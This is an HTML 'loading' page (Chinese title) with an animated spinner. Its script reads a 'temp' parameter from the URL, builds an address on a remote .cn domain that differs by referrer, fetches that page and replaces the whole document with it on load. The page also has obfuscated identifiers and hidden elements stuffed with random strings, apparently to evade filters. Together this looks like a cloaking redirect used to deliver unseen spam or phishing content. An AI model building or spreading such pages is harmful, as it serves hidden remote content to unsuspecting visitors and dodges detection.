<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .d0cfed {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .d0cfed .JUz5MDImcWF {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .d0cfed .content {
            line-height: 50px;
            text-align: center
        }

        .d0cfed .img {
            width: 100%
        }

        .d0cfed .WMq0q4 {
            text-align: center
        }

        .d0cfed .WMq0q4 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .d0cfed .WMq0q4 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .d0cfed .WMq0q4 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .d0cfed .WMq0q4 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .d0cfed .WMq0q4 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .d0cfed .WMq0q4 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .d0cfed .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function ZHM4IiYyt(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var TBsrp = ZHM4IiYyt('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ TBsrp +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ TBsrp +".html?a=share";
		}
		
        gfs1NQ=url+"#"+new Date().getTime();
        gfs1NQ && function() {
            $.get(gfs1NQ, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>WApEDxPDlbeF2LxgEf53Kpy6WEq</span>
<span style='display:none'>WApEDxPDlbeF2LxgEf53Kpy6WEq</span>
<p  style='display:none'>niHnSCZFjv3ZzJ2lxpMkssKrlp4hZuXXoU7Ub4IO7rlvoXPsmGkpBitPB9TO3QRgvcnXYH2qZmzqXTlQJjMpqHFsfHYRAPgAIce</p>
<img  src='' style='display:none'>
<img  src='' style='display:none'><div class="d0cfed">
    <div class="JUz5MDImcWF">
        <div class="WMq0q4">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >cOJMn3FBiIXfFXToo5L96YyE1Q8L2kJzyeTCm</li>
<li style='display:none' >cOJMn3FBiIXfFXToo5L96YyE1Q8L2kJzyeTCm</li>
<span style='display:none'>Wpx97SXnmc7SCN0eCcXoQBUtuUKXljWmKxhSdmkbU8S1H1gIBBcS</span>
<ul style='display:none' >KV8G1nt52x9XmofqoeJxyhxeaf3xYkpBfutAQYzFiXM1pfyd</ul>
<span style='display:none'>Wpx97SXnmc7SCN0eCcXoQBUtuUKXljWmKxhSdmkbU8S1H1gIBBcS</span>
<a  href='#' style='display:none'>R33g9DgHMm4G34QSjrJ71SyiBozZTDI6j9yIuoCgwGZWELZI0cKI5HzD7KEPjhyO24OttaOf8Mh0c8iPMBQ</a></body>
</html>